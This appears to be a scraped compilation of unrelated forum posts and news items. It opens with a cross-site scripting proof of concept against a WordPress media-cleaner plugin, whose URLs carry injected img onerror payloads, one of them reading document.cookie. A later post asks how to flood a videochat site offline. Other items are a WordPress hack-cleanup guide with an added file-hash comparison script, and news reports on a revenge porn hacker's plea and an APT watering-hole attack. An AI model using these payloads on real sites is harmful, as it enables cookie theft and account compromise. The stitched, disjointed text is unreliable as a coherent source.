# Vulnerable Parameter(s):
[+] view, paged, s
# Proof of Concept
--> http://target.com/wordpress/wp-admin/upload.php?s=test&page=wp-media-cleaner&view={XSS}&paged={XSS}&s={XSS}
--> http://localhost/wordpress/wp-admin/upload.php?s=test&page=wp-media-cleaner&view="><img src=i onerror=prompt(/xss/)>&paged="><img src=i onerror=prompt(document.cookie)>&s="><img src=i onerror=prompt(/XSS/)>
Source
  17. Hi everyone, I'd like to flood or somehow take down this site (Videochat in Iasi), at least for a short period of time. Do you think it's possible?
  18. Hi. I have a site and I want to implement payment by SMS. The problem is that most SMS payment sites only accept legal entities and PFAs (sole traders). Does anyone know a site that accepts SMS payments without needing a PFA or a company?
  19. Hi, I'm buying an online movie site with a minimum of 1000 visitors/day from Google. I only do the deal with users who have rep / seniority on the forum / a recommendation from a mod or admin.
  20. Hello friends! Today I found a site that organizes giveaways regularly. Step 1. Go to the site: Earn your Steam games for free on Steamgameswap - sGs (referral link) Step 2. Click Sign in with Steam Step 3. Go here (without referral) Earn your Steam games for free on Steamgameswap - sGs - Giveaway and here Earn your Steam games for free on Steamgameswap - sGs - Opiumpulses and sign up for all of them. Good luck winning games, friends
  21. WordPress is the most popular CMS (Content Management System) available nowadays online, used by the vast majority of all sites. If you have a look at this report, WordPress holds the lion share (60.6%) of the sites whose CMS we know and a total of 23.4% of all sites. It is easy to use and it offers great flexibility, with both ready and custom templates and a plethora of plugins to put into effect. Moreover, WordPress provides its users with the opportunity to enhance the SEO-friendly (and thus Google-friendly) nature of their site pretty smoothly and it also offers mobile-friendly themes. These are some of the major reasons why WordPress has been characterized as one of the most successful CMS options to date, and this is why it is the number one choice for many web designers, developers, tech freaks and even novices and tech-illiterate people who seek to find a simple yet effective tool for creating their site.

Due to its exponential growth and its universal popularity, WordPress is not immune to threats and hacking attempts. It is true that the more popular something is, the more likely it will be for others to seek compromising it in the long run. This is why it is not that rare a phenomenon to hear about WordPress sites having been hacked and not being able to function properly. Before we continue with our guide about cleaning up WordPress, it is important that we truly understand what website hacking is and what this can do to your site and your computer.

What Website Hacking is, and How it Affects You
There are two major types of website hacking that you should beware of, in order to ensure that you offer the best user experience to every single visitor and not compromise his or her overall security:
- The first type has to do with the establishment of a backdoor; this means that the hacker leaves room for returning to your site whenever he feels like it and gaining access to places that should be out of reach for him. The difficulty in tracing this type of website hacking lies in the fact that this backdoor is not visible to the naked eye – and thus it can go unnoticed for a truly long time.
- The second type involves the deterioration of user experience and the compromise of your site directly from the source. The visitors that click on your site can be redirected to other sites or get pop-ups on their screen as soon as they head to your home page. In addition, malware can be installed silently to the computers of your site’s visitors, and of course this is never a good thing.
Now that we have comprehended what goes on in cases of WordPress sites being hacked, and before moving on to the process of WordPress database cleanup, it is time to highlight the signs that should alarm you that something is wrong with your site.

Signs that Reveal a Potential WordPress Hack
Even though the signs are not a perfect match to every single WordPress site that has been compromised, they offer some truly helpful information that should get you on your feet and urge you to dig deeper and see whether or not your site has indeed been hacked. Let’s see these signs in the form of bullets:
- Problems with e-mails: The hackers will start sending e-mails from your site, and you will most probably be blocked as a spam mailer. This can affect your communication with others, as you will not even have a clue about your e-mail activity.
- Bad content added to WP: You cannot control what content is added to your site, and this is in fact one of the major factors that ought to urge you to start cleaning up the mess.
- Slow performance or crash: This is another indicator that you are in need of WordPress clean up after a hack. If you are experiencing too slow performance or if you see that your site has crashed, you should look no further.
- Traffic drops significantly: You will most likely observe that you get no traffic at all or you have lost most of your visitors from one day to the next. Unless you have dealt with a matter of bad reputation recently, this should alarm you.
- Website disappears: This is the most shocking sign that your site has been under attack. In some cases, the hackers remove everything from the site and thus take it down.
As soon as you have noticed some of these signs, it is high time to take matters into your own hands. Though this process is neither easy nor simple to complete, you can in fact repair your WordPress site and make sure that you shield it against any future acts of this sort.

How to Repair Your Hacked WordPress Site
From the very moment when you determine that your WordPress site has been hacked, you need to take some immediate actions and start working toward cleaning everything up and securing your digital premises. Let’s have a look at what it takes for you to accomplish that:
- Restore Your Site via Upgrade and Reinstallation: Make use of your backup and restore your site, so that it can keep running. Upon doing so, you need to be thorough while reinstalling all the plugins and additional tools that you have been using so far. It is important to reinstall them and then upgrade them to the latest version.
- Scan and Cleanup Your Machine: If you had not installed an anti-virus program, please DO! This is essential, in order to highlight any red flags for you to consider. Scan the machine of yours in detail and fix any problems that emerge.
- Change All the Passwords: Do not be sloppy when it comes to cleaning up WordPress. On the contrary, you ought to be really scholastic and change all the passwords that you have been using in e-mail accounts, financial transactions and anywhere else. Of course, it goes without even saying that you need to change the WP administrator password and get a new one (rather than the default that many users don’t mind keeping).
- Back up Everything: Besides being able to restore your site in the event of hacking or crashing, you can compare the backups with your current WP site and check for any alterations whatsoever.
- Check wp-config.php File: If you come across any modifications when comparing your file with the wp-config-sample.php file, you had better change them.
- Engage in Premium Security Solutions: Although it can be tempting to handle your WordPress site and its maintenance on your own or make use of your son’s talent or the wit of your best friend, such options generally come with a greater percentage of risk. Instead, consider premium security solutions that will safeguard your site and deal with the proper WordPress maintenance required.
- Any Uploaded File Should Be Copied: This will allow you to keep everything under control. Even in the discomforting event of a crash or any other problem getting in the way, you will know that you have got copies to turn to.
- Fresh, New Version of WordPress: Do not settle for older versions of WordPress. Instead, be sure to get updates and have the latest version of WordPress that has fixed security issues and can keep you thoroughly protected.
- Go through Every Post: This can take some time, but it is worth the trouble. You should go through every post of yours and identify any problem, in order to deal with it effectively.

How to Protect Your Site from Any Future Attack
As hacking is not a one-time deal, you will have to comply with some security precautions that help you maintain everything perfectly secured on your WordPress site. Below, there are some pieces of advice that you ought to consider for protecting your WordPress website from any malicious intent:
- Restrict Administrative Privileges: The fewer the people who access your admin panel, the less likely it will be for breaches to occur.
- Scan on a Daily Basis: If you are vigilant and you do not neglect scanning your site daily for bugs and other vulnerabilities, the hack is less likely to succeed.
- Use Secured Protocols: Instead of connecting with the use of FTP, you can go for SFTP or SSH for ensuring that it is infinitely more difficult for somebody to track you down.
- Use 2-Step Verification: Make sure that you enhance your site’s security using 2-step verification. This will result in the hacker requiring much bigger effort towards accessing your site.
- Disable PHP Execution: You can find detailed instructions on how you can do that, since it will certainly help you eliminate threats in the future.
From everything that has been analyzed in this article on cleaning up WordPress, this is a tough job – however, it is not impossible to complete and what you gain is truly remarkable; a fully protected WordPress site that does not compromise anything in terms of security and performance! Source
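Two of the repair steps in the post above, comparing a backup with the current site and checking wp-config.php against the shipped sample file, both come down to finding which files differ between two directory trees. The script below is an added example, not code from the article or from WordPress: it hashes every file under two roots and reports what was added, removed or modified, which is how a backdoor dropped into wp-content/uploads or a line injected into a theme file shows up. The trees that demo() builds are constructed stand-ins for a clean backup and a tampered live copy; their paths and contents are invented for illustration.

```python
"""Compare a clean backup of a WordPress tree with the live copy.

Added example (not from the article or from WordPress). Hashes every file
under two roots and reports added, removed and modified paths.
"""
import hashlib
import os
import sys
import tempfile


def hash_tree(root):
    """Map each file's path relative to `root` (with '/' separators) to its SHA-256."""
    digests = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            h = hashlib.sha256()
            with open(path, "rb") as f:
                for chunk in iter(lambda: f.read(65536), b""):
                    h.update(chunk)
            digests[rel] = h.hexdigest()
    return digests


def diff_trees(baseline, current):
    """Return {'added': [...], 'removed': [...], 'modified': [...]} between two hash maps."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(p for p in set(baseline) & set(current) if baseline[p] != current[p])
    return {"added": added, "removed": removed, "modified": modified}


def _write(root, rel, content):
    """Helper for the constructed demo trees: create parent dirs and write a text file."""
    path = os.path.join(root, rel)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w") as f:
        f.write(content)


def demo():
    """Build a constructed clean backup and a tampered live copy, then diff them."""
    with tempfile.TemporaryDirectory() as tmp:
        backup = os.path.join(tmp, "backup")
        live = os.path.join(tmp, "live")
        for root in (backup, live):
            _write(root, "wp-config.php", "<?php define('DB_NAME', 'wp'); ?>\n")
            _write(root, "wp-content/themes/t/header.php", "<?php wp_head(); ?>\n")
            _write(root, "wp-content/plugins/p/p.php", "<?php // plugin (constructed) ?>\n")
        # Constructed tampering in the live copy: an injected script tag in the theme,
        # an unexpected PHP file under uploads, and a plugin file that went missing.
        _write(live, "wp-content/themes/t/header.php",
               "<?php wp_head(); ?>\n<script src=\"http://tracker.invalid/x.js\"></script>\n")
        _write(live, "wp-content/uploads/unexpected.php",
               "<?php /* constructed: PHP should never appear under uploads */ ?>\n")
        os.remove(os.path.join(live, "wp-content/plugins/p/p.php"))
        return diff_trees(hash_tree(backup), hash_tree(live))


if __name__ == "__main__":
    if len(sys.argv) == 3:
        result = diff_trees(hash_tree(sys.argv[1]), hash_tree(sys.argv[2]))
    else:
        result = demo()
    for kind, paths in result.items():
        for p in paths:
            print(f"{kind:9s} {p}")
```

Run it as `python compare_tree.py /path/to/backup /path/to/live` against real directories, or with no arguments to see the constructed demo. Any PHP file reported as added under wp-content/uploads, and any modified file outside the ones you changed yourself, deserves a look before the site is considered clean.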
  22. On Wednesday, Hunter Moore, 28, the notorious founder and operator of revenge porn site IsAnyoneUp.com, pleaded guilty [PDF] to unauthorized access to a computer, aiding and abetting unauthorized access of a computer, and identity theft. The charges each carry a maximum penalty of two to five years in jail, though Moore will not be sentenced until a later date.

Moore’s IsAnybodyUp.com became hugely popular for posting nude and sexually explicit photos of people without their permission, and it spawned copycat revenge porn sites like Craig Brittain's IsAnybodyDown.com and Kevin Bollaert’s ugotposted.com. (Brittain was banned from posting any more nude photos of people without their explicit permission in a settlement with the Federal Trade Commission in January, while Bollaert was found guilty earlier this month of identity theft and extortion.)

Moore’s site at one point allegedly received over 30 million page views and was bringing in about $10,000 in ad revenue per month. Some of the photos on Moore’s site came from disgruntled lovers handing over their ex’s nude pics (hence the name “revenge porn”), but Moore also pleaded guilty to paying conspirator Charles “Gary” Evens to steal nude photos from victims, often paying Evens up to $200 per week.

"To help populate the site with nude photos, defendant aided, abetted, and procured, and willfully caused co-defendant Charles Evens ('Evens') to intentionally access, without authorization, a computer used in interstate commerce belonging to Google by accessing the victims’ e-mail accounts,” Moore’s plea agreement states.

As Ars reported when Moore was arrested in January 2014, Evens compromised hundreds of e-mail accounts through social engineering. "It was not exploiting, to our knowledge, any vulnerabilities in any of these online accounts,” Assistant US Attorney Wendy Wu told Ars last year. "Basically, he was impersonating these victims' friends and was able to get confidential information that would allow him to access their accounts.”

At one point, Rolling Stone deemed Moore the "Most Hated Man on the Internet," writing, "What was really inspired about [isAnybodyUp.com] was that alongside the photos, Moore included the ex's full name, profession, social-media profile and city of residence, which ensured that the pictures would pop up on Google, which further ensured that, in short order, the ex's mom and boss and everyone else would be seeing him or her online, sans skivvies."

Besides a prison term and years of supervised parole, Moore’s plea agreement specifies that the government may delete all the data on Moore’s seized digital devices. "Moore is currently scheduled to be in court on Wednesday, February 25," a press officer for the Central California US Attorney's Office wrote to Ars. "But there is a strong possibility that his next court appearance will be delayed until March."

In the UK and California, authorities have been trying to crack down on revenge porn with legislation. Earlier this month, England and Wales passed a law making it a criminal act to distribute nude and explicit photos of a person without their permission, and in California a similar year-old law was used in December to convict a man who posted photos of his ex-girlfriend on Facebook. Source
  24. Hello, to improve my knowledge base I work for free for those who need a presentation site, or changes or improvements to an existing site. Those in need, send a private message.
  25. A Chinese APT group was able to chain together two zero day vulnerabilities, one against Adobe’s Flash Player and one against Microsoft’s Internet Explorer 9, to compromise a popular news site late last year. The group’s aim was to gain access to computers at several U.S. defense and financial firms by setting up a watering hole attack on the site that would go on to drop a malicious .DLL.

Researchers with Invincea and iSIGHT Partners worked in tandem to dig up information about the group, which was able to compromise a part of Forbes.com’s website that appears to users before they’re ported over to articles they’ve clicked on. That portion of the site, Forbes.com’s Thought of the Day, is powered by a Flash widget. According to researchers with Invincea the group was able to use a zero day vulnerability to hijack that widget for a short period, from Nov. 28 to Dec. 1. Over the course of those four days, the group targeted visitors to the site who worked at a handful of unnamed U.S. defense and financial firms.

Researchers with iSIGHT discovered that in addition to the Flash flaw, the attackers also exploited an Internet Explorer vulnerability, a zero day that helped attackers bypass Address Space Layout Randomization (ASLR) in IE 9. While the Adobe bug, a buffer overflow (CVE-2014-9163), was patched back on Dec. 9, the ASLR mitigation bypass (CVE-2015-0071) was one of many patched yesterday in Microsoft’s monthly Patch Tuesday round of patches, an update that was especially heavy on Internet Explorer fixes.

In a technical writeup of the attack yesterday, Invincea explained how Forbes’ site was able to redirect to an IP address, load the Flash exploit, and drop a DLL, hrn.dll, to be loaded into the machine’s memory. “Once in memory, the exploit gains administrative privileges and opens a command prompt,” Invincea’s executive summary reads, “Next the victim system was scanned to report on its current patch levels, network mapping, and complete IP configuration, including any VPN connections.” Both firms agreed to set their disclosures for yesterday to coincide with Microsoft’s patching of the Internet Explorer bug.

While Chinese APT groups have been in the news lately – some reports have already pinned last week’s Anthem breach on shadowy hackers from the PRC – several firms are already familiar with the APT group behind this campaign. FireEye first published research on the group back in 2013, referring to the collective as the Sunshop Group. Researchers there caught the group carrying out a campaign that hit a series of victims – a science and technology journal, a website for evangelical students, etc. – by exploiting an IE zero day and several Java bugs in May of that year. Throughout its research, dating back to 2010, iSIGHT has taken to calling the group Codoso Team. This attack, like others it’s linked back to them, used similar malware (Derusbi) and called on a command and control (C&C) domain it’s been seen using in the past as well.

Regardless of what it goes by, the group has been seen targeting U.S. government entities, the military/defense sector, and financial services groups for at least five years running. FireEye found the same group was also responsible for hacking the Nobel Peace Prize Committee website in 2010. That attack also used a watering hole and made use of a browser (Firefox) zero day. While neither iSIGHT nor Invincea could give concrete numbers regarding the number of victims Codoso was able to compromise with this campaign, both were firm in their stance that the attacks were highly targeted in nature and only visitors who worked at the defense and financial firms were infected. Source